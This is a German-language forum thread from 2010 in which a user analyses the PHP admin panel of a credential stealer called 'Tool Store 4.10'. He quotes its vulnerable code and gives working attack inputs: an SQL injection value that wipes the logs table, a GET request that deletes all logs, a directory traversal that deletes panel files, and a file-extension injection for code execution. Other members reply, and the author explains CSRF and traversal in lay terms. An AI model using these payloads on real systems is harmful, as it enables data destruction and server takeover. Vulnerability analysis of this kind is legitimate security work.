[Paper] Tool Store 4.10 exploited - PS-Evolution: Board

SFX · 29.11.2010, 20:21

So..

hatte heute abend mal ein wenig Zeit..

Zeit für ein wenig Pen Testing..

Ich habe mir dafür einfach mal den Tool Store 4.10 vorgenommen, ein Stealer der von Kiddies genutzt wird um anderen die Zugangsdaten zu stehlen da sie sich diese nicht selber leisten können

also, fang ich mal an..

auf einen Hinweis von Ratchet habe ich mir direkt mal die creater.php angeschaut, und er hatte Recht..

direkt da war die suche schon zuende..

Abgesehen von einem Full Path Disclosure war da auch direkt eine SQL Injection

hmm.. doof.. eigentlich habe ich doch eine Beschäftigung für den ganzen Abend gesucht :/

naja.. weiter gehts..

mal eben nachgeschaut was sonst noch alles geladen wird..

und nachdem ich durch war..

kein CSRF Schutz..

win :>

damit war es schonmal möglich jede Menge Unfug zu treiben..

zB Acc's löschen..

aber, nein, anstatt einfach wild IDs zu raten wird noch einer drauf gesetzt..

PHP-Code:


			
    if(isset($_POST['del'])){
        for ($i=0; $i<count($_POST["dele"]); $i++) {
            $wegdamit = $_POST['dele'][$i];
            mysql_query("DELETE FROM logs WHERE id = '$wegdamit'");
        }
        
        echo '<script>alert(unescape("'.$i.' Logs successfully deleted!"));</script>
              <meta http-equiv="refresh" content="0; URL=logs.php">';
    }

$_POST['dele'][0] = "' OR '1";

und plötzlich ist die Logs Table leer..

als weiter zur nächsten...

ups..

was ist denn das.. ?

*runter scroll*

man muss garnicht mal über CSRF eine Injection durchführen, es geht noch viel stilvoller..

[ IMG ]http://kiddy.example.com/logs.php?delall2=ja [ /IMG ]

gleiches Ergebnis, viel stilvoller ^^

so, jetzt aber wirklich weiter zur nächsten Datei..

export.php

auch wieder nice..

PHP-Code:


			
if(isset($_GET['del'])){
    $file = $_GET['del'];
    
    unlink('logs/'.$file);
    echo '<meta http-equiv="refresh" content="0; url=export.php">';
}

gleiches Prinzip, andere Situation:

[ IMG ]http://kiddy.example.com/export.php?file=../creater.php [ /IMG ]

funktioniert auf allen win servern und jedem misconfigured server..

und plötzlich kommen garkeine Accounts mehr..

seltsam..

auch recht unterhaltsam ist die feedback.php

der Fail lässt sich nicht in worte fassen, ich hab mehrmals versucht einen passenden Satz zu formulieren, bin allerdings gescheitert..

ich lasse einfach mal den Code für mich sprechen..

PHP-Code:


			
<?php
/*
*****************************
*###TOOLSTORE STEALER RIP###*
*****************************

*****************************
*    Stealer by Ghosty   *
*    Panel   by rb7        *
*                * 
*****************************
*/

session_start();

    require_once('inc/session.php');
    require_once('inc/config.php');
    require_once('inc/grund.php');
    
    $zahl1 = rand(1,10);
    $zahl2 = rand(1,10);
?>

<h2>Feedback</h2>
<div id="infobox"><img src="img/other/information.png" /> Please send us a feedback with improvement suggestions</div>
<br/>

<form action="feedback.php" method="post">
    <p><label>Nachricht</label></p><p><textarea class="tb" style="width: 15.5em;" rows="5" cols="30" name="text" id="nachricht"></textarea></p>
    <p><label>Question (<?php echo $zahl1; ?> + <?php echo $zahl2; ?>)</label></p><p><input type="text" class="tb" name="antwort" /></p>
    <p><input type="hidden" name="zahl1" value="<?php echo $zahl1; ?>" /></p>
    <p><input type="hidden" name="zahl2" value="<?php echo $zahl2; ?>" /></p>
    <p><input type="submit" class="button" name="abschicken" value="Send feedback" /></p>
</form>

<?php
if(isset($_POST['abschicken'])){
    $nachricht = $_POST['text'];
    $antwort   = $_POST['antwort'];
    $add1       = $_POST['zahl1'];
    $add2       = $_POST['zahl2'];
                    
    //Addieren
    $richtig = $add1 + $add2;
                
    if(!empty($nachricht) && $antwort == $richtig){
        $sender     = '[email protected]';
        $empfaenger = '[email protected]';
        $seite        = $_SERVER['SERVER_NAME'].$_SERVER['PHP_SELF'];
        $betreff    = 'Feedback';
        $mailtext   = 'Seite: '.$seite.' Nachricht: '.$nachricht;
                        
        mail($empfaenger, $betreff, $mailtext, "From: $sender "); 
            echo '<b class="green">Thank you!</b>';
        }else{
            echo '<b class="red">Error!</b>';
    }
}
require_once('inc/footer.php');
?>

Captcha fail
Spam Protection fail

die backup.php sieht noch so aus als könnte man damit das Panel vollständig defacen (mal abgesehen von einem xss deface bei dem man via sql injection htmlspecialchars bypassed)

hab ich jetzt aber nicht weiter überprüft

naja, wer noch lust hat den Server zu rooten..

Code:

$art     = $_POST['art'];
[...]
$endung = $art; // durch Funktionsaufruf
[...]
$handle = fopen('backups/'.$date.'.'.$endung,'w+');

wer da noch nicht Lunte gerochen hat..

$_POST['art'] = 'php';

davor natürlich noch den entsprechenden Code in die db injeziert..

ich denke das waren vorerst die interessantesten Punkte..

Verdammt..

Ich glaube meine Pizza ist jetzt kalt..

Na dann.. soweit von meiner Seite..
MfG
sfx

killthematrix · 29.11.2010, 20:24

ich hab kein wort verstanden xD aber für deine mühe gibs ein danke

gogokiller · 29.11.2010, 20:42

Hab ich das richtig verstanden das das Prog ein Fail is? Muss killthematrix zustimmen

SFX · 29.11.2010, 20:44

Ich hab mit dem Text ein paar deftige Sicherheitslücken zusammen gefasst.. ^^

Der Thread ist hauptsächlich für Security Seiten geschrieben, wollte ihn aber euch nicht vorenthalten ^^

gogokiller · 29.11.2010, 20:46

Ah ok, jetz hab ichs verstanden

x iR0CK5TAR x · 29.11.2010, 20:49

Ich denke: Owned, ist definitiv das richtige Wort!
Saubere Arbeit SFXY

Finn · 29.11.2010, 20:58

schöner Bericht. Erinnert mich an Mark Zuckerberg im Facebook Film, der "einige bedenkliche Sicherheitslücken im System der Hardward Universität offenlegte".

heißt das, dass du von jedem Server die Log-Dateien löschen kannst?
Wie bist du eig. an die Source gekommen?

SFX · 29.11.2010, 21:03

Zitat:

Zitat von Finn

heißt das, dass du von jedem Server die Log-Dateien löschen kannst?

löschen... downloaden... ^^

Zitat:

Zitat von Finn

Wie bist du eig. an die Source gekommen?

der ist public

Dizzy · 29.11.2010, 22:11

Den haste ge42igt!

Find deine Formulierungen auch immer sehr amüsant

Macht auch Spass zu lesen wenn man keine Ahnung von der Materie hat.

Raccon · 30.11.2010, 05:36

Sorry, leider habe ich bis auf Server nichts verstanden.
Wäre es möglich das ganze mit ein paar "deutschen" Wörtern zu formulieren ??? So das ein Leie (so wie ich) ein bischen versteht worum es überhaupt geht.

@ SFX ... Mal ganz erlich: Wer bist du ??? Was bist du ??? Ahhhhh ......... ich habs ............ du bist ........... einer der ................ PC Götter.
Ich habe schon davon gehört, aber einen zu kennen, das übersteigt meine Vorstellung.
Hut ab, ich habe richtig respekt vor dir und deiner Arbeit (und auch ein winig angst (wenn du sauer wirst machst du meinen Rechner platt)). *zitter*

SFX · 30.11.2010, 16:55

Naja.. das sind ein paar Schwachstellen die ein wenig schwer zu verstehen sind wenn man noch nie php programmiert hat..

SQL Injection = hier fehlt eine Überprüfung und ich kann den Code ergänzen.. und so dass ich dinge sehe/tun kann die ich eigentlich nicht können dürfte

CSRF = Cross Site Request Forgery = Wenn der Admin eine Session offen hat und nicht überprüft wird von wo der Request wirklich kommt kann ich im Hintergrund zB über diese Admin Session "Lösch mal alle gestohlenen Accounts" an den Server geben..

Da das über den PC des Admins abläuft muss ich mir keine Gedanken über die Authentifizierung machen, es besteht ja bereits eine aktive Session

Directory Traversal = Ich bewege mich aus dem Ordner in dem ich eigentlich arbeiten soll raus und kann stattdessen andere Dateien benutzen an die ich eigentlich nicht kommen dürfte..

In diesem Fall:

Ich darf alle Dateien im logs Ordner löschen die ich will, bei xyz.txt:

logs/xyz.txt

wenn ich jetzt aber als Datei ../index.php angebe, habe ich diese Datei:

logs/../index.php

mit ../ gehe ich ein Verzeichnis zurück und bin damit aus dem logs ordner "ausgebrochen".. und kann jetzt bei den Systemdateien munter drauf los löschen ^^

Ich weiß, das ist etwas kompliziert, ich habs auch nicht an einem Tag gelernt, ich hoffe du hast einen groben Eindruck bekommen..

und Angst musst du wirklich keine haben ^^

MR. T · 30.11.2010, 17:05

Du sollst nicht immer so angeben SFX !

Raccon · 01.12.2010, 02:22

THX SFX
Das ist klasse erklärt, das habe ich besser verstanden. ^^ Das sind ja richtige Sicherheitslücken die eigentlich garnicht da sein dürften.

Wie lange dauert es eigentlich bis man php kann ??? Und was ist besser: php oder c++ ???

Finn · 01.12.2010, 17:57

Zitat:

Zitat von Raccon

THX SFX
Das ist klasse erklärt, das habe ich besser verstanden. ^^ Das sind ja richtige Sicherheitslücken die eigentlich garnicht da sein dürften.

Wie lange dauert es eigentlich bis man php kann ??? Und was ist besser: php oder c++ ???

Ehh, du weißt schon dass php keine Programmiersprache ist?
Und wenn du dich dran setzt und das Zeug lernst kannst du schon nach wenigen Tagen oder Wochen php. Je nachdem wie wichtig es dir ist. Aber: nicht so gut wie Sfx ;D Der verbringt sein Leben damit (:

Pedobear · 01.12.2010, 18:20

Zitat:

Zitat von Finn

Der verbringt sein Leben damit (:

Zitat:

Zitat von Zitat von mir von gestern

[19:53:06] Michi: ach sfx, ich dachte der tag fängt so gut an, indem du ein mädl anschreibst und jetzt bist du schon wieder am kiddies bashen :/

Tja, es ist halt unser SFX, entweder man liebt ihn oder man hasst ihn